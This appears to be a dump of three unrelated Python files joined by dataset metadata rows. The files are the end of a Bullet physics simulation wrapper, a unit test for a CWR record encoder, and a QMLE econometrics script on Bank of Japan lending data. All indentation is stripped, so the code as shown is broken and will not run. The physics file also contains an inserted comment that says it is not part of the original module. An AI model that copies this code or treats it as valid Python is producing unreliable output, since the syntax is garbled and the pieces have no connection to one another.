# Update the mass but leave the inertia intact. This is somewhat
# awkward to implement because Bullet returns the inverse values yet
# expects the non-inverted ones in 'set_mass_props'.
if rbState.imass == 0:
# Static body: mass and inertia are zero anyway.
body.setMassProps(0, Vec3(0, 0, 0))
else:
m = rbState.imass
x, y, z = body.getInvInertiaDiagLocal().topy()
if (m < 1E-10) or (x < 1E-10) or (y < 1E-10) or (z < 1E-10):
# Use safe values if either the inertia or the mass is too
# small for inversion.
m = x = y = z = 1
else:
# Inverse mass and inertia.
x = 1 / x
y = 1 / y
z = 1 / z
m = 1 / m
# Apply the new mass and inertia.
body.setMassProps(m, Vec3(x, y, z))
# Overwrite the old RigidBodyData instance with the latest version.
body.azrael = (bodyID, rbState)
return RetVal(True, None, None)
def setConstraints(self, constraints: (tuple, list)):
"""
Apply the ``constraints`` to the specified bodies in the world.
If one or more of the rigid bodies specified in any of the constraints
do not exist then this method will abort. Similarly, it will also abort
if one or more constraints could not be constructed for whatever
reason (eg. unknown constraint name).
In any case, this function will either apply all constraints or none.
It is not possible that this function applies only some constraints.
:param list constraints: list of `ConstraintMeta` instances.
:return: Success
"""
def _buildConstraint(c):
"""
Compile the constraint `c` into the proper C-level Bullet body.
"""
# Get handles to the two bodies. This will raise a KeyError unless
# both bodies exist.
rb_a = self.rigidBodies[c.rb_a]
rb_b = self.rigidBodies[c.rb_b]
# Construct the specified constraint type. Raise an error if the
# constraint could not be constructed (eg the constraint name is
# unknown).
if c.contype.upper() == 'P2P':
tmp = ConstraintP2P(*c.condata)
out = azBullet.Point2PointConstraint(
rb_a, rb_b,
Vec3(*tmp.pivot_a),
Vec3(*tmp.pivot_b)
)
elif c.contype.upper() == '6DOFSPRING2':
t = Constraint6DofSpring2(*c.condata)
fa, fb = t.frameInA, t.frameInB
frameInA = Transform(Quaternion(*fa[3:]), Vec3(*fa[:3]))
frameInB = Transform(Quaternion(*fb[3:]), Vec3(*fb[:3]))
out = azBullet.Generic6DofSpring2Constraint(
rb_a, rb_b, frameInA, frameInB
)
out.setLinearLowerLimit(Vec3(*t.linLimitLo))
out.setLinearUpperLimit(Vec3(*t.linLimitHi))
out.setAngularLowerLimit(Vec3(*t.rotLimitLo))
out.setAngularUpperLimit(Vec3(*t.rotLimitHi))
for ii in range(6):
if not t.enableSpring[ii]:
out.enableSpring(ii, False)
continue
out.enableSpring(ii, True)
out.setStiffness(ii, t.stiffness[ii])
out.setDamping(ii, t.damping[ii])
out.setEquilibriumPoint(ii, t.equilibrium[ii])
for ii in range(3):
out.setBounce(ii, t.bounce[ii])
else:
assert False
# Return the Bullet constraint body.
return out
# Compile a list of all Bullet constraints.
try:
constraints = [ConstraintMeta(*_) for _ in constraints]
out = [_buildConstraint(_) for _ in constraints]
except (TypeError, AttributeError, KeyError, AssertionError):
return RetVal(False, 'Could not compile all Constraints.', None)
# Apply the constraints.
fun = self.dynamicsWorld.addConstraint
for c in out:
fun(c)
# All went well.
return RetVal(True, None, None)
def clearAllConstraints(self):
"""
Remove all constraints from the simulation.
:return: success
"""
# Convenience.
world = self.dynamicsWorld
# Return immediately if the world has no constraints to remove.
if world.getNumConstraints() == 0:
return RetVal(True, None, None)
# Iterate over all constraints and remove them.
for c in world.iterateConstraints():
world.removeConstraint(c)
# Verify that the number of constraints is now zero.
if world.getNumConstraints() != 0:
return RetVal(False, 'Bug: #constraints must now be zero', None)
else:
return RetVal(True, None, None)
@typecheck
def compileCollisionShape(self, bodyID: int, rbState: _RigidBodyData):
"""
Return the correct Bullet collision shape based on ``rbState``.
This is a convenience method only.
fixme: find out how to combine mass/inertia of multi body bodies.
:param int bodyID: body ID.
:param _RigidBodyData rbState: meta data to describe the body.
:return: compound shape with all the individual shapes.
:rtype: ``CompoundShape``
"""
# Create the compound shape that will hold all other shapes.
compound = azBullet.CompoundShape()
# Aggregate the total mass and inertia.
tot_mass = 0
tot_inertia = Vec3(0, 0, 0)
# Bodies with virtually no mass will be converted to static bodies.
# This is almost certainly not what the user wants but it is the only
# safe option here. Note: it is the user's responsibility to ensure the
# mass is reasonably large!
if rbState.imass > 1E-4:
rbState_mass = 1.0 / rbState.imass
else:
rbState_mass = 0
# Create the collision shapes one by one.
scale = rbState.scale
for name, cs in rbState.cshapes.items():
# Convert the input data to a CollShapeMeta tuple. This is
# necessary if the data passed to us here comes straight from the
            # database because then it is merely a list of values, not (yet)
# a named tuple.
cs = CollShapeMeta(*cs)
# Determine which CollisionShape to instantiate, scale it
# accordingly, and apply create it in Bullet.
cstype = cs.cstype.upper()
if cstype == 'SPHERE':
sphere = CollShapeSphere(*cs.csdata)
child = azBullet.SphereShape(scale * sphere.radius)
elif cstype == 'BOX':
box = CollShapeBox(*cs.csdata)
hl = Vec3(scale * box.x, scale * box.y, scale * box.z)
child = azBullet.BoxShape(hl)
elif cstype == 'EMPTY':
child = azBullet.EmptyShape()
elif cstype == 'PLANE':
# Planes are always static.
rbState_mass = 0
plane = CollShapePlane(*cs.csdata)
normal = Vec3(*plane.normal)
child = azBullet.StaticPlaneShape(normal, plane.ofs)
else:
child = azBullet.EmptyShape()
msg = 'Unrecognised collision shape <{}>'.format(cstype)
self.logit.warning(msg)
# Let Bullet compute the local inertia of the body.
inertia = child.calculateLocalInertia(rbState_mass)
# Warn about unreasonable inertia values.
if rbState_mass > 0:
tmp = np.array(inertia.topy())
if not (1E-5 < np.sqrt(np.dot(tmp, tmp)) < 100):
msg = 'Inertia = ({:.1E}, {:.1E}, {:.1E})'
self.logit.warning(msg.format(*inertia.topy()))
del tmp
# Add the collision shape at the respective position and
# rotation relative to the parent.
t = azBullet.Transform(Quaternion(*cs.rotation),
Vec3(*cs.position))
compound.addChildShape(t, child)
tot_mass += rbState_mass
tot_inertia += inertia
return RetVal(True, None, (tot_mass, tot_inertia, compound))
@typecheck
def createRigidBody(self, bodyID: int, rbState: _RigidBodyData):
"""
Create a new rigid body ``rbState`` with ``bodyID``.
:param int bodyID: ID of new rigid body.
:param _RigidBodyData rbState: State Variables of rigid body.
:return: Success
"""
# Convert rotation and position to Bullet types.
rot = Quaternion(*rbState.rotation)
pos = Vec3(*rbState.position)
# Build the collision shape.
ret = self.compileCollisionShape(bodyID, rbState)
mass, inertia, cshapes = ret.data
# Create a motion state for the initial rotation and position.
ms = azBullet.DefaultMotionState(azBullet.Transform(rot, pos))
# Instantiate the actual rigid body.
ci = azBullet.RigidBodyConstructionInfo(mass, ms, cshapes, inertia)
body = PyRigidBody(ci)
# Set additional parameters.
body.setFriction(0.1)
body.setDamping(0.02, 0.02)
body.setSleepingThresholds(0.1, 0.1)
# Attach my own admin structure to the body.
body.azrael = (bodyID, rbState)
# Add the rigid body to the body cache.
self.rigidBodies[bodyID] = body
return RetVal(True, None, None)
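# Illustrative call sequence (added for clarity; not part of the original
# module). It assumes `rbState` is a valid ``types.RigidBodyData`` instance
# built elsewhere:
#
#   sim = PyBulletDynamicsWorld(engineID=0)
#   sim.setRigidBodyData(bodyID=1, rbState=rbState)
#   sim.applyForceAndTorque(1, force=(0, 0, 10), torque=(0, 0, 0))
#   sim.compute([1], dt=1.0, max_substeps=60)
#   ret = sim.getRigidBodyData(1)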
| agpl-3.0 | 6,817,916,343,925,518,000 | 37.6 | 85 | 0.60327 | false |
weso/CWR-DataApi | tests/parser/dictionary/encoder/record/test_npn.py | 1 | 1526 | # -*- coding: utf-8 -*-
import unittest
from cwr.parser.encoder.dictionary import \
NonRomanAlphabetPublisherNameDictionaryEncoder
from cwr.non_roman_alphabet import NonRomanAlphabetPublisherNameRecord
"""
NPNRecord to dictionary encoding tests.
The following cases are tested:
"""
__author__ = 'Bernardo Martínez Garrido'
__license__ = 'MIT'
__status__ = 'Development'
class TestNPNRecordDictionaryEncoding(unittest.TestCase):
def setUp(self):
self._encoder = NonRomanAlphabetPublisherNameDictionaryEncoder()
def test_encoded(self):
data = NonRomanAlphabetPublisherNameRecord(record_type='NPN',
transaction_sequence_n=3,
record_sequence_n=15,
publisher_sequence_n=17,
ip_n='ABC123',
publisher_name='NAME',
language_code='ES')
encoded = self._encoder.encode(data)
self.assertEqual('NPN', encoded['record_type'])
self.assertEqual(3, encoded['transaction_sequence_n'])
self.assertEqual(15, encoded['record_sequence_n'])
self.assertEqual(17, encoded['publisher_sequence_n'])
self.assertEqual('ABC123', encoded['ip_n'])
self.assertEqual('NAME', encoded['publisher_name'])
self.assertEqual('ES', encoded['language_code'])
| mit | -9,134,457,041,738,474,000 | 36.195122 | 76 | 0.56918 | false |
yu45020/Social-Dynamics-in-Lending-Opinion | Codes/Japandata.py | 1 | 3468 | from MLE import *
data_path = '../Data/BOJ/'
output = '../Paper/Result/ModelResult/JP/'
#peer only
N = number_banks = 25
file_name = data_path+"BOJ data.csv"
dat = pd.read_csv(file_name)
year = dat['Year']
dat = dat.iloc[:,1]
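# Build one-step-ahead pairs: y is the DICS series at time t, x0 the same
# series lagged by one period.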
y=dat.iloc[1:]
y=y.reset_index(drop=True)
x0=dat.iloc[:-1]
x0=x0.reset_index(drop=True)
y_act = np.insert(np.array(y),0,x0[0])
exog = pd.DataFrame(dat.iloc[:-1])
exog = exog.reset_index(drop=True)
add_con(exog)
qmle = QMLE(y, x0,exog,N)
result_M1 = qmle.fit(method='ncg',avextol=1e-12)
label_names = ['v'] + list(exog)
M1 = result_M1.summary(xname=label_names,title='M1')
result_params = result_M1.params
x_t_pred = predict(x0=x0,exog=exog,params=result_params,Num_bank=N,repeat=20)
df = {"DATE":year,"DICS Actual":y_act,"DICS M4 Predicted":x_t_pred}
out=pd.DataFrame(df)
out.to_csv('./img/BOJ M1 plot.csv',index=False)
write_latex(M1,output,'BOJ M1.tex','QMLE BOJ M1')
# M2 / M3 (named as M4 full)
N = number_banks = 26
file_name = data_path+"BOJ complete.csv"
dat = pd.read_csv(file_name)
year = dat['Year']
dat = dat.iloc[:,1:]
y=dat.iloc[1:,0]
y=y.reset_index(drop=True)
x0=dat.iloc[:-1,0]
x0=x0.reset_index(drop=True)
y_act = np.insert(np.array(y),0,x0[0])
exog = dat.iloc[:-1,0:]
exog = exog.reset_index(drop=True)
exog = exog[['DICS', 'VJX',"Business Forecast ", 'NPL negative',"NPL positive","Bankrupt positive","Bankrupt negative",
"DIHRLD",
"Nikkei"]]
#"NPL positive", Nikkei
add_con(exog)
exog = exog[['DICS', 'VJX',"Business Forecast ", 'Nikkei',"RGDP_lag2 negative",
"DIHRLD"]]
qmle = QMLE(y, x0,exog,N)
result_M1 = qmle.fit(method='ncg',avextol=1e-12,maxiter=1000)
label_names = ['v'] + list(exog)
M1 = result_M1.summary(xname=label_names,title='M1')
result_params = result_M1.params
x_t_pred = predict2(x0=x0,exog=exog,params=result_params,Num_bank=N,repeat=40)
df = {"DATE":year,"DICS Actual":y_act,"DICS M4 Predicted":x_t_pred}
out=pd.DataFrame(df)
out.to_csv('./img/BOJ M2 no badloans plot.csv',index=False)
write_latex(M1,output,'BOJM4.tex','QMLE BOJ M4')
#forward
qmle = QMLE(y.iloc[:40], x0.iloc[:40],exog.iloc[:40,],N)
result_M1 = qmle.fit(method='ncg',avextol=1e-12,maxiter=1000)
result_params = result_M1.params
x_t_pred = predict2(x0=x0,exog=exog,params=result_params,Num_bank=N,repeat=40)
df = {"DATE":year,"DICS Actual":y_act,"DICS M4 Predicted":x_t_pred}
out=pd.DataFrame(df)
out.to_csv('./img/BOJ M2 first 70 plot.csv',index=False)
# back
## back
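# Refit on the later sub-sample, predict forward from t=10, and run the same
# fitted model over the reversed early series to back-cast the first quarters
# before stitching the two predicted pieces together.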
qmle = QMLE(y.iloc[10:], x0.iloc[10:],exog.iloc[10:,],N)
result_M1 = qmle.fit(method='ncg',avextol=1e-8,maxiter=1000)
result_params = result_M1.params
x0_1 =x0.iloc[10:].reset_index(drop=True)
exog_1 = exog.iloc[10:,].reset_index(drop=True)
x_t_pred1 = predict2(x0=x0_1,exog=exog_1,params=result_params,Num_bank=N,repeat=20)
x0_back =x0.iloc[10::-1]
x0_back.reset_index(drop=True,inplace=True)
exog_back=exog.iloc[10::-1,]
exog_back.reset_index(drop=True,inplace=True)
x_t_pred0 = predict2(x0=x0_back,exog=exog_back,params=result_params,Num_bank=N,repeat=20)
x_t_pred0=pd.DataFrame(x_t_pred0)
x_t_pred0=x_t_pred0[1:-1]
x_t_pred0 = x_t_pred0[::-1]
x_t_pred = pd.concat([x_t_pred0,pd.DataFrame(x_t_pred1)],ignore_index=True)
df = {"DATE":year,"DICS Actual":pd.Series(y_act),"DICS M4 Predicted":x_t_pred}
out=pd.concat(df,axis=1)
out.to_csv('./img/BOJ M last 65 plot.csv',index=False)
| gpl-3.0 | -6,536,490,217,122,991,000 | 28.156522 | 119 | 0.656863 | false |